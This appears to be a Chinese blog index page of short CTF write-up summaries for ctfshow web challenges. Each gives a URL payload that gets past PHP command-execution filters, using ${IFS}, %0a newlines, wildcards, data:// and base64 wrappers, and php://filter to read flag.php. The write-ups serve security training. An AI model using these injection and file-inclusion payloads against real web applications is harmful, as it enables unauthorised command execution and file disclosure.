摘要: 在web44的基础上过滤了空格,利用$绕过空格 payload:?c=more${IFS}f*%0a 阅读全文
posted @ 2021-02-02 18:47 z1ten9 阅读(70) 评论(0) 推荐(0)
摘要: 在web43的基础上过滤了flag payload:?c=more fl*%0a 阅读全文
posted @ 2021-02-02 18:39 z1ten9 阅读(69) 评论(0) 推荐(0)
摘要: 在web42的前提下过滤了;以及cat payload:?c=more flag.php%0a 其中%0a是换行 阅读全文
posted @ 2021-02-02 18:22 z1ten9 阅读(91) 评论(0) 推荐(0)
摘要: 引用yanjiee大佬的博客了解一下>/dev/null 2>&1是个什么东西 简单来说就是会把错误重定向 那我们就不用管了,照常就行了 payload:/?c=cat flag.php; 阅读全文
posted @ 2021-02-02 18:10 z1ten9 阅读(160) 评论(0) 推荐(0)
摘要: 利用data://text/plain,.php因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,直接无视 payload:?c=data://text/plain,<?php system("cat fl*");?> 阅读全文
posted @ 2021-02-02 17:46 z1ten9 阅读(206) 评论(0) 推荐(0)
摘要: 在web37的基础上过滤了php 使用data://text/plain;base64绕过 payload:?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs= PD9waHAgc3lzdGVtKCJjYXQgZioiKTs=即<? 阅读全文
posted @ 2021-02-02 10:13 z1ten9 阅读(147) 评论(0) 推荐(0)
摘要: file://协议 用于访问本地文件系统,在CTF中通常用来读取本地文件 示例:http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt php://协议 php:// 访问各个输入/输出流,在C 阅读全文
posted @ 2021-02-02 10:07 z1ten9 阅读(302) 评论(0) 推荐(0)
摘要: 34,35同web33一样 web36过滤了数字 payload:?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php 注:其中?>用来代替分号 阅读全文
posted @ 2021-02-02 09:39 z1ten9 阅读(135) 评论(0) 推荐(0)
摘要: 在web32的基础上过滤了引号 payload:?c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php 注:其中?>用来代替分号 阅读全文
posted @ 2021-02-02 09:29 z1ten9 阅读(169) 评论(0) 推荐(0)
摘要: 在web31的基础上额外过滤了括号 include可以不使用括号直接使用 payload:?c=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php 注:其中?>用来代替分号 阅读全文
posted @ 2021-02-01 12:24 z1ten9 阅读(284) 评论(0) 推荐(0)